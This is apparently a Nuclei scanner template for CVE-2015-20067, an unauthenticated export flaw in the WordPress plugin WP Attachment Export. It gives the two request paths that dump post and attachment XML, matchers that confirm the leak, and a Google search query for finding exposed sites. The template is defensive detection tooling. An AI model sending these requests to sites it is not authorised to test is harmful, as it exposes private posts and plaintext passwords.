nuclei-templates/http/cves/2015/CVE-2015-20067.yaml

41 lines
1.7 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2015-20067
info:
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
author: r3Y3r53
severity: high
description: |
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
2023-10-17 17:21:59 +00:00
remediation: Fixed in 0.2.4
2023-10-17 07:20:28 +00:00
reference:
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
- https://packetstormsecurity.com/files/132693/
- https://seclists.org/fulldisclosure/2015/Jul/73
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
classification:
cve-id: CVE-2015-20067
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: 862
metadata:
max-request: 2
verified: true
2023-10-17 17:32:04 +00:00
google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
2023-10-17 17:21:59 +00:00
tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan
2023-10-17 07:20:28 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/xml")'
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
condition: and
# digest: 4b0a00483046022100c3094b36bbe20fa181efa0ebb7100749ad77eb38a7c0c266f48d485931e8dbdc022100cdc3319af15d2f35ebdfcbe5c99e0304b65e039dd2108b84e5d010ef48ad9285:922c64590222798bb761d5b6d8e72950